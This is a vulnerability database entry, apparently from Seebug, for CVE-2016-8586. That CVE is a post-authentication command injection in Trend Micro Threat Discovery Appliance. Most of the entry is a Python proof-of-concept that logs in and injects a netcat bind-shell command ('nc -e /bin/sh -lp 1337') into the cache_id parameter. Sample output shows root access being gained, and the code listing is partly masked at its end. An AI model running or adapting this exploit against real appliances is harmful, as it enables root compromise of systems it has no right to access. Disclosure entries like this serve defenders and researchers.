Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8586)

基本字段

漏洞编号:
SSV-92983
披露/发现时间:
未知
提交时间:
2017-04-21
漏洞等级:
漏洞类别:
代码执行
影响组件:
Trend Micro InterScan VirusWall
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
CVE-2016-8586
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

Summary:

There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.

Notes:

  • Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was exec a bind shell using netcat.
  • Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...

Example:

saturn:trend_micro_threat_discovery_detected_potential_files_rce mr_me$ ./poc.py 
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin123
saturn:trend_micro_threat_discovery_detected_potential_files_rce mr_me$ ./poc.py 172.16.175.123 admin
(+) logged in...
(+) starting backdoor, this will take a few secs...
(+) calling backdoor!
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
pwd
/opt/TrendMicro/MinorityReport/www/cgi-bin
exit
共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
e_url = "%scgi-bin/detected_potential_files.cgi" % bu
s = requests.Session()
def exec_bd(s, e_url):
# now we setup our backdoor
# no reverse, since it seems to fail !?
netcat = "|`nc -e /bin/sh -lp 1337`"
e_url += "?act=search&cache_id=%s" % netcat
s.get(e_url, verify=False, proxies={"http":"https://127.0.0.1:8081/"})
# first we login...
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
thread = threading.Thread(target=exec_bd, args=(s, e_url,))
thread.start()
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1212
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负